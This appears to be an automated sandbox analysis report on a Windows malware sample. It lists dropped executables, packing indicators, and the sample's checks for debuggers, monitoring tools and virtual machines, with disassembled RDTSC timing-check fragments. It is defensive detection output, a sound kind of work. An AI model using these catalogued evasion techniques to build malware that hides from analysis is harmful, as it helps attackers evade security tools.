Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll

Source: C:\Users\user\Desktop\es5qBEFupj.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\es5qBEFupj.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: es5qBEFupj.exe

Static file information: File size 7114240 > 1048576

Source: es5qBEFupj.exe	Static PE information: Raw size of is bigger than: 0x100000 < 0x518a00
Source: es5qBEFupj.exe	Static PE information: Raw size of ggsvuvii is bigger than: 0x100000 < 0x1ab600

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\es5qBEFupj.exe

Unpacked PE file: 0.2.es5qBEFupj.exe.340000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ggsvuvii:EW;bfvlwstb:EW;.taggant:EW; vs :ER;.rsrc:W;

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe

Code function: 7_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,

7_2_00406328

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: PasoCattle.exe.0.dr	Static PE information: real checksum: 0x102e74 should be: 0x10b21d
Source: es5qBEFupj.exe	Static PE information: real checksum: 0x6d86c7 should be: 0x6d8d0b

Source: es5qBEFupj.exe	Static PE information: section name:
Source: es5qBEFupj.exe	Static PE information: section name: .idata
Source: es5qBEFupj.exe	Static PE information: section name:
Source: es5qBEFupj.exe	Static PE information: section name: ggsvuvii
Source: es5qBEFupj.exe	Static PE information: section name: bfvlwstb
Source: es5qBEFupj.exe	Static PE information: section name: .taggant
Source: Set-up.exe.0.dr	Static PE information: section name: .eh_fram

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_0132D473 push esp; retn 0000h	8_3_0132D4F5
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_0132D473 push esp; retn 0000h	8_3_0132D4F5
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_012FB390 pushad ; ret	8_3_012FB399
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_0130FE52 push ebx; ret	8_3_0130FEFA
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_0130FE52 push ebx; ret	8_3_0130FEFA
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_01315ADC pushad ; ret	8_3_01315ADD
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_01315ADC pushad ; ret	8_3_01315ADD
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_0132D473 push esp; retn 0000h	8_3_0132D4F5
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_0132D473 push esp; retn 0000h	8_3_0132D4F5
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_012FB390 pushad ; ret	8_3_012FB399
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_0130FE52 push ebx; ret	8_3_0130FEFA
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_0130FE52 push ebx; ret	8_3_0130FEFA
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_01315ADC pushad ; ret	8_3_01315ADD
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_01315ADC pushad ; ret	8_3_01315ADD
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_0132D473 push esp; retn 0000h	8_3_0132D4F5
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_0132D473 push esp; retn 0000h	8_3_0132D4F5
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_012FB390 pushad ; ret	8_3_012FB399
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_0130FE52 push ebx; ret	8_3_0130FEFA
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_0130FE52 push ebx; ret	8_3_0130FEFA
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_01315ADC pushad ; ret	8_3_01315ADD
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 8_3_01315ADC pushad ; ret	8_3_01315ADD
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_3_039C7121 push ecx; iretd	21_3_039C7122
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_3_039C7121 push ecx; iretd	21_3_039C7122
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_3_039C7121 push ecx; iretd	21_3_039C7122
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_3_039C7121 push ecx; iretd	21_3_039C7122
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_3_039C7121 push ecx; iretd	21_3_039C7122
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_3_039C7121 push ecx; iretd	21_3_039C7122
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_3_039C7121 push ecx; iretd	21_3_039C7122
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_3_039C7121 push ecx; iretd	21_3_039C7122
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_3_039C7121 push ecx; iretd	21_3_039C7122
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_001002D8 push cs; retn 000Fh	21_2_00100318

Source: es5qBEFupj.exe

Static PE information: section name: ggsvuvii entropy: 7.953466652603566

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Jump to dropped file

Source: C:\Users\user\Desktop\es5qBEFupj.exe	File created: C:\Users\user\AppData\Local\Temp\Set-up.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Jump to dropped file
Source: C:\Users\user\Desktop\es5qBEFupj.exe	File created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\es5qBEFupj.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_001426DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		21_2_001426DD
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_000CFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		21_2_000CFC7C

Source: C:\Users\user\Desktop\es5qBEFupj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_21-105968

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\es5qBEFupj.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: es5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: PROCMON.EXE
Source: es5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: X64DBG.EXE
Source: es5qBEFupj.exe, es5qBEFupj.exe, 00000000.00000003.1280366142.0000000005300000.00000004.00001000.00020000.00000000.sdmp, es5qBEFupj.exe, 00000000.00000002.1321366859.0000000000342000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: SBIEDLL.DLL
Source: es5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: WINDBG.EXE
Source: Set-up.exe.0.dr	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: es5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000008.00000000.1291954581.0000000000AFB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: WIRESHARK.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C5AF31 second address: C5AF37 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C549CA second address: C549D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C549D2 second address: C549D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C549D8 second address: C549DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C549DD second address: C549E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C549E3 second address: C549E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C549E9 second address: C549ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C549ED second address: C549F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C549F1 second address: C54A35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F8AF10CF426h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jg 00007F8AF10CF426h 0x00000013 jmp 00007F8AF10CF438h 0x00000018 pop esi 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push ecx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f jc 00007F8AF10CF426h 0x00000025 jl 00007F8AF10CF426h 0x0000002b push edx 0x0000002c pop edx 0x0000002d popad 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C59E64 second address: C59E80 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8AF15A7F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8AF15A7F5Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C59E80 second address: C59E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C59E84 second address: C59E98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F8AF15A7F56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F8AF15A7F56h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C5A2FB second address: C5A31A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8AF10CF437h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C5A31A second address: C5A326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8AF15A7F56h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C5A486 second address: C5A48A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C5A5C6 second address: C5A5E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007F8AF15A7F64h 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C5A5E1 second address: C5A5E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C5C38D second address: C5C44B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xor dword ptr [esp], 77EA983Ah 0x0000000c jmp 00007F8AF15A7F5Ch 0x00000011 or esi, 130B0FD2h 0x00000017 push 00000003h 0x00000019 mov dword ptr [ebp+122D340Ch], ecx 0x0000001f push 00000000h 0x00000021 xor dword ptr [ebp+122D34E6h], edx 0x00000027 push 00000003h 0x00000029 and edx, dword ptr [ebp+122D38C7h] 0x0000002f call 00007F8AF15A7F59h 0x00000034 jmp 00007F8AF15A7F68h 0x00000039 push eax 0x0000003a jmp 00007F8AF15A7F5Fh 0x0000003f mov eax, dword ptr [esp+04h] 0x00000043 jno 00007F8AF15A7F70h 0x00000049 mov eax, dword ptr [eax] 0x0000004b push esi 0x0000004c push esi 0x0000004d jmp 00007F8AF15A7F67h 0x00000052 pop esi 0x00000053 pop esi 0x00000054 mov dword ptr [esp+04h], eax 0x00000058 pushad 0x00000059 push eax 0x0000005a push esi 0x0000005b pop esi 0x0000005c pop eax 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007F8AF15A7F5Bh 0x00000064 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C5C44B second address: C5C48A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 add edx, dword ptr [ebp+122D396Fh] 0x0000000e lea ebx, dword ptr [ebp+124561DAh] 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F8AF10CF428h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000018h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e sub si, D2E9h 0x00000033 xchg eax, ebx 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C5C48A second address: C5C494 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C5C494 second address: C5C498 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C5C511 second address: C5C517 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C5C517 second address: C5C51B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C5C51B second address: C5C597 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF15A7F62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jnl 00007F8AF15A7F6Eh 0x00000013 jmp 00007F8AF15A7F68h 0x00000018 push ecx 0x00000019 push edi 0x0000001a pop edi 0x0000001b pop ecx 0x0000001c popad 0x0000001d nop 0x0000001e push 00000000h 0x00000020 push ebp 0x00000021 call 00007F8AF15A7F58h 0x00000026 pop ebp 0x00000027 mov dword ptr [esp+04h], ebp 0x0000002b add dword ptr [esp+04h], 00000019h 0x00000033 inc ebp 0x00000034 push ebp 0x00000035 ret 0x00000036 pop ebp 0x00000037 ret 0x00000038 push ecx 0x00000039 mov esi, dword ptr [ebp+122D398Fh] 0x0000003f pop edx 0x00000040 mov esi, dword ptr [ebp+122D3B6Bh] 0x00000046 push 00000000h 0x00000048 movzx esi, si 0x0000004b push F42E327Ah 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
